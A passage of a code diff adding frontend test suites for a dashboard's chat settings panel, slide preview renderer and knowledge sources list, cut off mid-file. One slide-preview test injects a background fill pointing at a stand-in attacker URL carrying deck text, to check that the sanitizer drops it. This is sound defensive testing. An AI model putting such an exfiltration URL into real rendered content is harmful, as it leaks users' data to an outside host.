+    fireEvent.click(within(group).getByRole('button', { name: 'Full' }))
+    await waitFor(() => expect(storedChat().contentWidth).toBe('full'))
+  })
+
+  it.each([
+    ['Show Timestamps', 'showTimestamps', false],
+    ['Pin the latest prompt', 'pinLastPrompt', false],
+    ['Simplified Tool Call Names', 'simplifiedToolNames', false],
+    ['Show Context Percentage', 'showContextPct', true],
+  ])('stores %s locally when flipped', async (label, key, expected) => {
+    wrap()
+    fireEvent.click(await screen.findByRole('switch', { name: label }))
+    await waitFor(() => expect(storedChat()[key]).toBe(expected))
+  })
+
+  it('inverts the stored collapse flag behind Show Thinking Inline', async () => {
+    wrap()
+    // The row shows the INVERSE of collapseAllSteps, so turning it on must
+    // write `false` — a straight passthrough would flip the meaning.
+    const sw = await screen.findByRole('switch', { name: 'Show Thinking Inline' })
+    expect(sw).toHaveAttribute('aria-checked', 'false')
+    fireEvent.click(sw)
+    await waitFor(() => expect(storedChat().collapseAllSteps).toBe(false))
+  })
+
+  it('stores the file-change chip style', async () => {
+    wrap()
+    await pickOption('File Change Chips', 1)
+    await waitFor(() => expect(storedChat().fileChipStyle).toBe('minimal'))
+  })
+
+  it('persists the widget density', async () => {
+    wrap()
+    await pickOption('Widget Density', 1)
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({ ...BASE_DASH, widget_density: 'less' })
+    )
+  })
+
+  it('persists the response verbosity', async () => {
+    wrap()
+    await pickOption('Response Verbosity', 1)
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({ ...BASE_DASH, verbosity: 'concise' })
+    )
+  })
+
+  it('persists the MCP app side-panel toggle', async () => {
+    wrap()
+    fireEvent.click(await settledSwitch('MCP Apps in Side Panel'))
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({ ...BASE_DASH, mcp_app_panel: true })
+    )
+  })
+
+  it('persists the folder-suggestions toggle', async () => {
+    wrap()
+    fireEvent.click(await settledSwitch('Folder suggestions'))
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({
+        ...BASE_DASH,
+        folder_suggestions_enabled: false,
+      })
+    )
+  })
+
+  it('rolls the Feature Tips preference back when the write fails', async () => {
+    rejectOnce(tipsFeedbackMock)
+    wrap()
+    const sw = await settledSwitch('Feature Tips')
+    await waitFor(() => expect(sw).toHaveAttribute('aria-checked', 'true'))
+    fireEvent.click(sw)
+    expect(await screen.findByText(/Failed to save tips preference/)).toBeInTheDocument()
+    await waitFor(() => expect(sw).toHaveAttribute('aria-checked', 'true'))
+  })
+})
+
+describe('ChatPanel — Sessions', () => {
+  it.each([
+    ['Split View (Session Grid)', 'session_grid', true],
+    ['Tail-only Fork', 'tail_fork_enabled', true],
+    ['Restore Sessions', 'restore_sessions', true],
+  ])('persists %s through the dashboard config', async (label, key, expected) => {
+    wrap()
+    fireEvent.click(await settledSwitch(label))
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({ ...BASE_DASH, [key]: expected })
+    )
+  })
+
+  it.each([
+    ['History Expanded', 'historyExpanded', false],
+    ['Confirm Before Closing Session', 'confirmCloseSession', true],
+    ['Default to Autopilot Mode', 'defaultAutopilot', true],
+  ])('stores %s locally when flipped', async (label, key, expected) => {
+    wrap()
+    fireEvent.click(await screen.findByRole('switch', { name: label }))
+    await waitFor(() => expect(storedChat()[key]).toBe(expected))
+  })
+
+  it('hides the restore window until session restore is on', async () => {
+    wrap()
+    await settledSwitch('Restore Sessions')
+    expect(screen.queryByRole('combobox', { name: 'Restore Window' })).not.toBeInTheDocument()
+  })
+
+  it('offers a no-limit window and persists the picked one', async () => {
+    dashboardConfigMock.mockImplementation(
+      () => Promise.resolve({ ...BASE_DASH, restore_sessions: true }) as never
+    )
+    wrap()
+    const opts = await openSelect('Restore Window')
+    expect(opts.map(o => o.textContent)).toEqual([
+      '15m',
+      '30m',
+      '1h',
+      '2h',
+      '6h',
+      '12h',
+      '24h',
+      'No limit',
+    ])
+    fireEvent.click(opts[2])
+    await waitFor(() =>
+      expect(updateDashboardConfigMock).toHaveBeenCalledWith({
+        ...BASE_DASH,
+        restore_sessions: true,
+        restore_window_minutes: 60,
+      })
+    )
+  })
+})
+
+describe('ChatPanel — Context', () => {
+  it('PATCHes the auto-compact threshold as a number', async () => {
+    wrap()
+    await pickOption('Auto-Compact Threshold', 1)
+    await waitFor(() =>
+      expect(patchConfigMock).toHaveBeenCalledWith('session.autocompact_pct', 40)
+    )
+  })
+
+  it('surfaces a failed auto-compact write', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    await pickOption('Auto-Compact Threshold', 0)
+    expect(await screen.findByText(/Failed to save auto-compact threshold/)).toBeInTheDocument()
+  })
+})
+
+describe('ChatPanel — Knowledge Library', () => {
+  it('PATCHes the auto-ingest budget on blur with an in-range integer', async () => {
+    wrap()
+    const input = await settledInput('Auto-Ingest Limit Per Scan')
+    await waitFor(() => expect(input.value).toBe('200'))
+    fireEvent.change(input, { target: { value: '500' } })
+    fireEvent.blur(input)
+    await waitFor(() =>
+      expect(patchConfigMock).toHaveBeenCalledWith('knowledge.auto_ingest_chunk_budget', 500)
+    )
+  })
+
+  it.each([
+    ['above the ceiling', '99999'],
+    ['negative', '-5'],
+    ['not a number', 'nope'],
+  ])('reverts the auto-ingest budget and writes nothing when %s', async (_case, typed) => {
+    wrap()
+    const input = await settledInput('Auto-Ingest Limit Per Scan')
+    await waitFor(() => expect(input.value).toBe('200'))
+    fireEvent.change(input, { target: { value: typed } })
+    fireEvent.blur(input)
+    expect(patchConfigMock).not.toHaveBeenCalled()
+    expect(input.value).toBe('200')
+  })
+
+  it('reverts the auto-ingest budget to the server value when the write fails', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    const input = await settledInput('Auto-Ingest Limit Per Scan')
+    await waitFor(() => expect(input.value).toBe('200'))
+    fireEvent.change(input, { target: { value: '900' } })
+    fireEvent.blur(input)
+    expect(await screen.findByText(/Failed to save knowledge setting/)).toBeInTheDocument()
+    await waitFor(() => expect(input.value).toBe('200'))
+  })
+
+  it('surfaces a failed knowledge toggle write', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    fireEvent.click(await settledSwitch('Auto-Add Documents'))
+    expect(await screen.findByText(/Failed to save knowledge setting/)).toBeInTheDocument()
+  })
+})
+
+describe('ChatPanel — Subagents', () => {
+  it('PATCHes the completion-keep mode on selection', async () => {
+    wrap()
+    const opts = await openSelect('Completion Event Truncation')
+    expect(opts.map(o => o.textContent)).toEqual([
+      'Head (preserve start of stream)',
+      'Tail (preserve end / final summary)',
+      'Both (head + tail with truncation marker)',
+    ])
+    fireEvent.click(opts[1])
+    await waitFor(() => expect(patchConfigMock).toHaveBeenCalledWith('agent.completion_keep', 'tail'))
+  })
+
+  it('surfaces a failed completion-keep-mode write', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    await pickOption('Completion Event Truncation', 2)
+    expect(await screen.findByText(/Failed to save completion-keep mode/)).toBeInTheDocument()
+  })
+
+  it('reverts the completion-keep characters when the write fails', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    const input = await settledInput('Completion event characters')
+    await waitFor(() => expect(input.value).toBe('3000'))
+    fireEvent.change(input, { target: { value: '8000' } })
+    fireEvent.blur(input)
+    expect(await screen.findByText(/Failed to save completion-keep characters/)).toBeInTheDocument()
+    await waitFor(() => expect(input.value).toBe('3000'))
+  })
+})
+
+describe('ChatPanel — per-role models', () => {
+  it.each([
+    ['Background Model', 'agent.role_models.background'],
+    ['Subagent Model', 'agent.role_models.subagent'],
+  ])('%s PATCHes its own config path', async (label, path) => {
+    wrap()
+    await waitFor(() => expect(modelsMock).toHaveBeenCalled())
+    await openSelect(label)
+    fireEvent.click(screen.getByRole('option', { name: 'claude-opus-4.8' }))
+    await waitFor(() => expect(patchConfigMock).toHaveBeenCalledWith(path, 'claude-opus-4.8'))
+  })
+
+  it.each([['Background Model'], ['Subagent Model']])(
+    '%s surfaces a failed write',
+    async label => {
+      rejectOnce(patchConfigMock)
+      wrap()
+      await waitFor(() => expect(modelsMock).toHaveBeenCalled())
+      await openSelect(label)
+      fireEvent.click(screen.getByRole('option', { name: 'claude-haiku-4.5' }))
+      expect(await screen.findByText(/Failed to save role model/)).toBeInTheDocument()
+    }
+  )
+
+  it('labels the unset role model as the provider default', async () => {
+    wrap()
+    const opts = await openSelect('Background Model')
+    expect(opts.map(o => o.textContent)).toEqual([
+      'Default (auto)',
+      'claude-opus-4.8',
+      'claude-haiku-4.5',
+    ])
+  })
+
+  it('keeps a pinned role model selectable when the backend stops listing it', async () => {
+    // Dropping it would move the select to a foreign value, and the resulting
+    // change event would overwrite the operator's pin.
+    seedMc({ agent: { role_models: { background: 'claude-opus-4.7-retired' } } })
+    wrap()
+    await waitFor(() => expect(modelsMock).toHaveBeenCalled())
+    const opts = await openSelect('Background Model')
+    expect(opts.map(o => o.textContent)).toContain('claude-opus-4.7-retired')
+    expect(patchConfigMock).not.toHaveBeenCalled()
+  })
+})
+
+describe('ChatPanel — per-role reasoning effort', () => {
+  it.each([
+    ['Background Effort', 'background', 'agent.role_efforts.background'],
+    ['Subagent Effort', 'subagent', 'agent.role_efforts.subagent'],
+  ])('%s PATCHes its own config path once the role model can reason', async (label, role, path) => {
+    seedMc({ agent: { role_models: { [role]: 'claude-opus-4.8' } } })
+    wrap()
+    await openSelect(label)
+    fireEvent.click(screen.getByRole('option', { name: 'High' }))
+    await waitFor(() => expect(patchConfigMock).toHaveBeenCalledWith(path, 'high'))
+  })
+
+  it.each([
+    ['Background Effort', 'background'],
+    ['Subagent Effort', 'subagent'],
+  ])('%s surfaces a failed write', async (label, role) => {
+    seedMc({ agent: { role_models: { [role]: 'claude-opus-4.8' } } })
+    rejectOnce(patchConfigMock)
+    wrap()
+    await openSelect(label)
+    fireEvent.click(screen.getByRole('option', { name: 'Max' }))
+    expect(await screen.findByText(/Failed to save role effort/)).toBeInTheDocument()
+  })
+
+  it.each([['Background Effort'], ['Subagent Effort']])(
+    '%s is inert while the role inherits a non-reasoning chat default',
+    async label => {
+      // Role model 'auto' resolves to the chat default, which is 'auto' here —
+      // not reasoning-capable, so the row stays visible but cannot be opened.
+      wrap()
+      const trigger = await screen.findByRole('combobox', { name: label })
+      await waitFor(() => expect(trigger).toHaveAttribute('data-disabled'))
+      fireEvent.click(trigger)
+      expect(screen.queryByRole('listbox')).not.toBeInTheDocument()
+      expect(patchConfigMock).not.toHaveBeenCalled()
+    }
+  )
+
+  it('enables the role effort row from the chat default when the role is on auto', async () => {
+    // The gate reads the RESOLVED model: no pin, so the chat default decides.
+    seedMc({ agent: { model: 'claude-opus-4.8' } })
+    wrap()
+    await openSelect('Background Effort')
+    fireEvent.click(screen.getByRole('option', { name: 'Low' }))
+    await waitFor(() =>
+      expect(patchConfigMock).toHaveBeenCalledWith('agent.role_efforts.background', 'low')
+    )
+  })
+})
+
+describe('ChatPanel — About You and Power', () => {
+  it('PATCHes the technical comfort level', async () => {
+    wrap()
+    await pickOption('Technical Comfort', 2)
+    await waitFor(() =>
+      expect(patchConfigMock).toHaveBeenCalledWith(
+        'dashboard.user_technical_level',
+        'somewhat-technical'
+      )
+    )
+  })
+
+  it('surfaces a failed profile write', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    await pickOption('Technical Comfort', 1)
+    expect(await screen.findByText(/Failed to save profile/)).toBeInTheDocument()
+  })
+
+  it('PATCHes the prevent-sleep flag', async () => {
+    wrap()
+    fireEvent.click(await settledSwitch('Prevent sleep while running'))
+    await waitFor(() =>
+      expect(patchConfigMock).toHaveBeenCalledWith('dashboard.prevent_sleep', true)
+    )
+  })
+
+  it('reflects a stored prevent-sleep flag and turns it back off', async () => {
+    seedMc({ dashboard: { prevent_sleep: true } })
+    wrap()
+    const sw = await settledSwitch('Prevent sleep while running')
+    await waitFor(() => expect(sw).toHaveAttribute('aria-checked', 'true'))
+    fireEvent.click(sw)
+    await waitFor(() =>
+      expect(patchConfigMock).toHaveBeenCalledWith('dashboard.prevent_sleep', false)
+    )
+  })
+
+  it('surfaces a failed prevent-sleep write', async () => {
+    rejectOnce(patchConfigMock)
+    wrap()
+    fireEvent.click(await settledSwitch('Prevent sleep while running'))
+    expect(await screen.findByText(/Failed to save dashboard config/)).toBeInTheDocument()
+  })
+})

--- a/website/src/test/SlidePreviewCoverage.test.tsx
+++ b/website/src/test/SlidePreviewCoverage.test.tsx
@@ -1,0 +1,413 @@
+// @vitest-environment jsdom
+//
+// jsdom, NOT the suite-default happy-dom, for the same reason as the sibling
+// `SlidePreviewSanitize.test.tsx`: every fragment this component renders goes
+// through DOMPurify, and DOMPurify >=3.4.10 mishandles happy-dom's parser
+// (dropping benign drawing markup), so a happy-dom run would assert against an
+// empty subtree the shipped code never produces in a browser.
+/**
+ * SlidePreview — the RENDER half.
+ *
+ * The sibling file pins the sanitizing helpers; this one drives the component:
+ * the imperative SVG assembly, the background/defs branches, the recompose
+ * reveal, `prefers-reduced-motion`, the failure notice, and the effect's
+ * cancel/cleanup paths.
+ *
+ * `fetchArtifactJson` is the component's only input beyond its props, so the api
+ * module is mocked and each test hands the effect one payload. Assertions read
+ * the assembled SVG out of the container because the subtree is built with
+ * `createElementNS` rather than JSX — it is real DOM, just not React's.
+ */
+
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, screen, waitFor } from '@testing-library/react'
+
+import SlidePreview from '../apps/pptx-maker/SlidePreview'
+import { fetchArtifactJson } from '../apps/pptx-maker/api'
+import type { ComposePayload } from '../apps/pptx-maker/api'
+import { COMPOSE_VERSION } from '../apps/pptx-maker/lib'
+
+vi.mock('../apps/pptx-maker/api', () => ({
+  fetchArtifactJson: vi.fn(),
+}))
+
+const fetchJson = vi.mocked(fetchArtifactJson)
+
+function payload(over: Partial<ComposePayload> = {}): ComposePayload {
+  return {
+    version: COMPOSE_VERSION,
+    viewBox: '0 0 800 600',
+    components: [],
+    ...over,
+  }
+}
+
+/** The assembled slide root. Absent until the effect's fetch has resolved. */
+function slideRoot(container: HTMLElement): SVGSVGElement | null {
+  return container.querySelector<SVGSVGElement>('[role="img"]')
+}
+
+/** Direct-child groups, which are the per-component groups when no bgSvg is set. */
+function componentGroups(container: HTMLElement): SVGGElement[] {
+  const root = slideRoot(container)
+  if (!root) return []
+  return Array.from(root.children).filter(
+    (child): child is SVGGElement => child.tagName.toLowerCase() === 'g',
+  )
+}
+
+async function waitForSlide(container: HTMLElement): Promise<SVGSVGElement> {
+  await waitFor(() => expect(slideRoot(container)).not.toBeNull())
+  return slideRoot(container)!
+}
+
+beforeEach(() => {
+  fetchJson.mockReset()
+})
+
+afterEach(() => {
+  vi.restoreAllMocks()
+})
+
+describe('SlidePreview assembly', () => {
+  it('renders the payload as one labelled image with the payload viewBox', async () => {
+    fetchJson.mockResolvedValue(payload({ components: [{ svg: '<rect width="10" height="10"/>' }] }))
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    const root = await waitForSlide(container)
+    // The accessible contract: one image named after the slide, so a screen
+    // reader announces which slide this is rather than "graphic".
+    expect(screen.getByRole('img', { name: 'Slide 1' })).toBe(root)
+    expect(root.getAttribute('viewBox')).toBe('0 0 800 600')
+    expect(root.getAttribute('preserveAspectRatio')).toBe('xMidYMid')
+    expect(root.style.width).toBe('100%')
+    expect(root.style.height).toBe('100%')
+    // The whole subtree is inert: it is agent-authored markup on the dashboard's
+    // own origin, so it must never be an interaction surface.
+    expect(root.style.pointerEvents).toBe('none')
+    expect(fetchJson).toHaveBeenCalledWith('preview/s1.json')
+  })
+
+  it('falls back to a 1920x1080 viewBox and sizes the background rect from it', async () => {
+    // An empty viewBox and a missing components array are both shapes the engine
+    // can write; neither may blank the preview.
+    fetchJson.mockResolvedValue({ version: COMPOSE_VERSION, viewBox: '' } as ComposePayload)
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    const root = await waitForSlide(container)
+    expect(root.getAttribute('viewBox')).toBe('0 0 1920 1080')
+    const rect = root.querySelector('rect')
+    expect(rect?.getAttribute('width')).toBe('1920')
+    expect(rect?.getAttribute('height')).toBe('1080')
+    expect(componentGroups(container)).toHaveLength(0)
+  })
+
+  it('sizes the background rect from a non-default viewBox', async () => {
+    fetchJson.mockResolvedValue(payload({ viewBox: '0 0 640 480' }))
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    const root = await waitForSlide(container)
+    const rect = root.querySelector('rect')
+    expect(rect?.getAttribute('width')).toBe('640')
+    expect(rect?.getAttribute('height')).toBe('480')
+  })
+
+  it('keeps a same-document gradient as the background fill', async () => {
+    // The deck's shared gradients live in the separate defs payload and every
+    // slide reaches them by id, so a fragment fill must survive.
+    fetchJson.mockResolvedValue(payload({ bgFill: 'url(#brandGradient)' }))
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    const root = await waitForSlide(container)
+    expect(root.querySelector('rect')?.getAttribute('fill')).toBe('url(#brandGradient)')
+  })
+
+  it('drops an off-origin background fill to transparent', async () => {
+    // bgFill is written directly onto the rect, outside the sanitizing walk, so
+    // this call site carries its own guard: an off-origin FuncIRI here would be a
+    // live GET carrying the deck's text away in a query string.
+    fetchJson.mockResolvedValue(payload({ bgFill: 'url(https://attacker.example/?d=deck)' }))
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    const root = await waitForSlide(container)
+    const fill = root.querySelector('rect')?.getAttribute('fill')
+    expect(fill).toBe('transparent')
+    expect(fill).not.toContain('attacker.example')
+  })
+
+  it('uses transparent when the payload names no background fill', async () => {
+    fetchJson.mockResolvedValue(payload({ bgFill: '' }))
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    const root = await waitForSlide(container)
+    expect(root.querySelector('rect')?.getAttribute('fill')).toBe('transparent')
+  })
+
+  it('renders a background fragment instead of the fallback rect', async () => {
+    fetchJson.mockResolvedValue(
+      payload({ bgSvg: '<rect width="1920" height="1080" fill="#101418"/>' }),
+    )
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    const root = await waitForSlide(container)
+    // The background arrives as a group, and the fallback rect is NOT also drawn
+    // over it — the fill proves which of the two branches produced this rect.
+    expect(root.firstElementChild?.tagName.toLowerCase()).toBe('g')
+    expect(root.querySelectorAll('rect')).toHaveLength(1)
+    expect(root.querySelector('rect')?.getAttribute('fill')).toBe('#101418')
+  })
+
+  it('appends the deck shared defs so slides can reference them by id', async () => {
+    fetchJson.mockResolvedValue(payload())
+
+    const { container } = render(
+      <SlidePreview
+        composeUrl="preview/s1.json"
+        defs={{ defs: '<linearGradient id="deckGrad"><stop offset="0"/></linearGradient>' }}
+        label="Slide 1"
+      />,
+    )
+
+    const root = await waitForSlide(container)
+    expect(root.querySelector('#deckGrad')).not.toBeNull()
+  })
+
+  it('renders one group per component and leaves a first render unanimated', async () => {
+    // A first render fading everything in would make simply OPENING a finished
+    // deck look like it was being rebuilt, so `changed` is ignored here.
+    fetchJson.mockResolvedValue(
+      payload({
+        components: [
+          { svg: '<rect width="10" height="10"/>', changed: true },
+          { svg: '<circle r="5"/>', changed: true },
+        ],
+      }),
+    )
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    await waitForSlide(container)
+    const groups = componentGroups(container)
+    expect(groups).toHaveLength(2)
+    for (const group of groups) {
+      expect(group.style.opacity).toBe('1')
+      expect(group.style.transition).toBe('')
+    }
+  })
+
+  it('renders a component with no markup rather than skipping its group', async () => {
+    fetchJson.mockResolvedValue(payload({ components: [{ svg: '' }] }))
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    await waitForSlide(container)
+    const groups = componentGroups(container)
+    expect(groups).toHaveLength(1)
+    expect(groups[0].childNodes).toHaveLength(0)
+  })
+})
+
+describe('SlidePreview recompose reveal', () => {
+  it('fades in only the components the engine marked changed', async () => {
+    fetchJson.mockResolvedValue(payload({ components: [{ svg: '<rect width="1" height="1"/>' }] }))
+
+    const { container, rerender } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+    await waitForSlide(container)
+
+    fetchJson.mockResolvedValue(
+      payload({
+        components: [
+          { svg: '<rect width="10" height="10"/>', changed: true },
+          { svg: '<circle r="5"/>', changed: false },
+        ],
+      }),
+    )
+    rerender(<SlidePreview composeUrl="preview/s2.json" defs={null} label="Slide 1" />)
+
+    await waitFor(() => expect(componentGroups(container)).toHaveLength(2))
+    const [changed, unchanged] = componentGroups(container)
+    // The unchanged component is visible throughout; only the rewritten one
+    // starts hidden, which is what makes the reveal say WHICH part moved.
+    expect(unchanged.style.opacity).toBe('1')
+    expect(unchanged.style.transition).toBe('')
+    expect(changed.style.transition).toContain('420ms')
+    await waitFor(() => expect(changed.style.opacity).toBe('1'))
+  })
+
+  it('staggers several changed components and reveals every one', async () => {
+    fetchJson.mockResolvedValue(payload())
+
+    const { container, rerender } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+    await waitForSlide(container)
+
+    fetchJson.mockResolvedValue(
+      payload({
+        components: [
+          { svg: '<rect width="1" height="1"/>', changed: true },
+          { svg: '<rect width="2" height="2"/>', changed: true },
+          { svg: '<rect width="3" height="3"/>', changed: true },
+        ],
+      }),
+    )
+    rerender(<SlidePreview composeUrl="preview/s2.json" defs={null} label="Slide 1" />)
+
+    await waitFor(() => expect(componentGroups(container)).toHaveLength(3))
+    await waitFor(() => {
+      for (const group of componentGroups(container)) {
+        expect(group.style.opacity).toBe('1')
+      }
+    })
+  })
+
+  it('renders the final state immediately under prefers-reduced-motion', async () => {
+    const matchMedia = vi.fn().mockReturnValue({ matches: true })
+    vi.stubGlobal('matchMedia', matchMedia)
+    fetchJson.mockResolvedValue(payload())
+
+    const { container, rerender } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+    await waitForSlide(container)
+
+    fetchJson.mockResolvedValue(
+      payload({ components: [{ svg: '<rect width="1" height="1"/>', changed: true }] }),
+    )
+    rerender(<SlidePreview composeUrl="preview/s2.json" defs={null} label="Slide 1" />)
+
+    await waitFor(() => expect(componentGroups(container)).toHaveLength(1))
+    const [group] = componentGroups(container)
+    expect(group.style.opacity).toBe('1')
+    expect(group.style.transition).toBe('')
+    expect(matchMedia).toHaveBeenCalledWith('(prefers-reduced-motion: reduce)')
+    vi.unstubAllGlobals()
+  })
+
+  it('clears the pending reveal timers when the preview unmounts', async () => {
+    // Asserted through the timer bookkeeping rather than by waiting out the
+    // stagger: a fade that fired after teardown would be a write into an
+    // unmounted component's DOM, and a wall-clock wait would only catch that
+    // when the machine happened to be slow.
+    const STAGGER_MS = 140
+    const scheduled = vi.spyOn(window, 'setTimeout')
+    fetchJson.mockResolvedValue(payload())
+
+    const { container, rerender, unmount } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+    await waitForSlide(container)
+
+    fetchJson.mockResolvedValue(
+      payload({
+        components: [
+          { svg: '<rect width="1" height="1"/>', changed: true },
+          { svg: '<rect width="2" height="2"/>', changed: true },
+        ],
+      }),
+    )
+    rerender(<SlidePreview composeUrl="preview/s2.json" defs={null} label="Slide 1" />)
+    await waitFor(() => expect(componentGroups(container)).toHaveLength(2))
+
+    // The second changed component is the one still pending: its reveal is
+    // staggered behind the first, which fires immediately.
+    const index = scheduled.mock.calls.findIndex((call) => call[1] === STAGGER_MS)
+    expect(index, 'the staggered reveal timer was never scheduled').toBeGreaterThanOrEqual(0)
+    const timerId = scheduled.mock.results[index].value
+
+    const cleared = vi.spyOn(window, 'clearTimeout')
+    unmount()
+    expect(cleared).toHaveBeenCalledWith(timerId)
+  })
+})
+
+describe('SlidePreview failure states', () => {
+  it('shows the unavailable notice when the payload schema version moved on', async () => {
+    // A newer engine payload must say so rather than draw nonsense.
+    fetchJson.mockResolvedValue(payload({ version: COMPOSE_VERSION + 1 }))
+
+    const { container } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+
+    expect(await screen.findByText('Preview unavailable')).toBeInTheDocument()
+    expect(slideRoot(container)).toBeNull()
+  })
+
+  it('shows the notice when the payload cannot be fetched', async () => {
+    fetchJson.mockRejectedValue(new Error('HTTP 404'))
+
+    render(<SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />)
+
+    expect(await screen.findByText('Preview unavailable')).toBeInTheDocument()
+  })
+
+  it('treats the next poll after a failure as a first render, not a recompose', async () => {
+    // The failed path resets the last-rendered URL so a later poll retries. The
+    // observable consequence: the retry draws the final state immediately instead
+    // of animating, because there is no previous render to diff against.
+    fetchJson.mockRejectedValueOnce(new Error('HTTP 404'))
+
+    const { container, rerender } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+    expect(await screen.findByText('Preview unavailable')).toBeInTheDocument()
+
+    fetchJson.mockResolvedValue(
+      payload({ components: [{ svg: '<rect width="1" height="1"/>', changed: true }] }),
+    )
+    rerender(<SlidePreview composeUrl="preview/s2.json" defs={null} label="Slide 1" />)
+
+    await waitForSlide(container)
+    expect(screen.queryByText('Preview unavailable')).toBeNull()
+    const [group] = componentGroups(container)
+    expect(group.style.opacity).toBe('1')
+    expect(group.style.transition).toBe('')
+  })
+
+  it('draws nothing when the preview unmounts before the payload arrives', async () => {
+    let resolvePayload: (value: ComposePayload) => void = () => {}
+    fetchJson.mockReturnValue(
+      new Promise<ComposePayload>((resolve) => {
+        resolvePayload = resolve
+      }),
+    )
+
+    const { container, unmount } = render(
+      <SlidePreview composeUrl="preview/s1.json" defs={null} label="Slide 1" />,
+    )
+    unmount()
+    resolvePayload(payload({ components: [{ svg: '<rect width="1" height="1"/>' }] }))
+    await Promise.resolve()
+
+    expect(slideRoot(container)).toBeNull()
+    expect(screen.queryByText('Preview unavailable')).toBeNull()
+  })
+})

--- a/website/src/test/SourcesListCoverage.test.tsx
+++ b/website/src/test/SourcesListCoverage.test.tsx
@@ -1,0 +1,644 @@
+/**
+ * Behaviour tests for the knowledge sources list, aimed at the paths the four
+ * existing SourcesList suites leave cold.
+ *
+ * Those suites cover rename, spend figures, the namespace body field and the
+ * responsive row. What is untested is everything that MUTATES a source: the
+ * inline folder-scan panel (progress, retry/skip of a failed file, the
+ * invalidation that fires when a scan finishes), the row actions (sync, pause,
+ * resume, confirm, delete with its optimistic rollback), the add-source dialog's
+ * folder branch (folder picker, ignore patterns, recursive toggle) and the
+ * pending-confirmation dialog that stands between a folder and a large scan.
+ */
+import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'
+import { render, screen, fireEvent, waitFor, act } from '@testing-library/react'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+import type { ComponentProps } from 'react'
+import SourcesList from '../pages/knowledge/SourcesList'
+import * as api from '../pages/knowledge/api'
+import type { Source, SourceFileInfo, SourceFilesResponse } from '../pages/knowledge/types'
+
+vi.mock('../pages/knowledge/api', () => ({ knowledgeApi: vi.fn() }))
+
+type ListProps = ComponentProps<typeof SourcesList>
+type Handler = (path: string, opts?: RequestInit) => unknown
+
+/** Every test installs its own routing table; anything unrouted answers OK. */
+let handler: Handler = () => ({ ok: true })
+
+const src = (over: Partial<Source> = {}): Source => ({
+  id: 's1', name: 'doc.md', source_type: 'local_file', uri: '/tmp/doc.md',
+  sync_status: 'synced', item_count: 3, ...over,
+})
+
+const folder = (over: Partial<Source> = {}): Source =>
+  src({ id: 'f1', name: 'Notes folder', source_type: 'local_folder', uri: '/tmp/notes', sync_status: 'active', item_count: 5, ...over })
+
+const filesResp = (over: Partial<SourceFilesResponse> = {}): SourceFilesResponse => ({
+  files: [], total: 0, done: 0, failed: 0, skipped: 0, ...over,
+})
+
+const fileInfo = (file_path: string, status: SourceFileInfo['status'], over: Partial<SourceFileInfo> = {}): SourceFileInfo => ({
+  file_path, status, mtime: 0, item_count: 0, ...over,
+})
+
+function renderList(props: Partial<ListProps> = {}) {
+  const queryClient = new QueryClient({
+    defaultOptions: { queries: { retry: false }, mutations: { retry: false } },
+  })
+  const onIngest = vi.fn()
+  const setUploadNamespace = vi.fn()
+  const utils = render(
+    <QueryClientProvider client={queryClient}>
+      <SourcesList
+        onIngest={onIngest}
+        uploadNamespace=""
+        setUploadNamespace={setUploadNamespace}
+        namespaces={[]}
+        ingestionJobs={[]}
+        {...props}
+      />
+    </QueryClientProvider>,
+  )
+  return { ...utils, queryClient, onIngest, setUploadNamespace }
+}
+
+/** Calls made to a path, optionally narrowed to one HTTP method. */
+const callsTo = (path: string, method?: string) =>
+  vi.mocked(api.knowledgeApi).mock.calls.filter(([p, opts]) =>
+    p === path && (!method || (opts as RequestInit | undefined)?.method === method))
+
+let confirmSpy: ReturnType<typeof vi.spyOn> | undefined
+
+beforeEach(() => {
+  handler = () => ({ ok: true })
+  vi.mocked(api.knowledgeApi).mockReset()
+  vi.mocked(api.knowledgeApi).mockImplementation(
+    (async (path: string, opts?: RequestInit) => handler(path, opts)) as unknown as never,
+  )
+})
+
+afterEach(() => {
+  confirmSpy?.mockRestore()
+  confirmSpy = undefined
+})
+
+describe('SourcesList — inline folder scan panel', () => {
+  const scanFiles = [
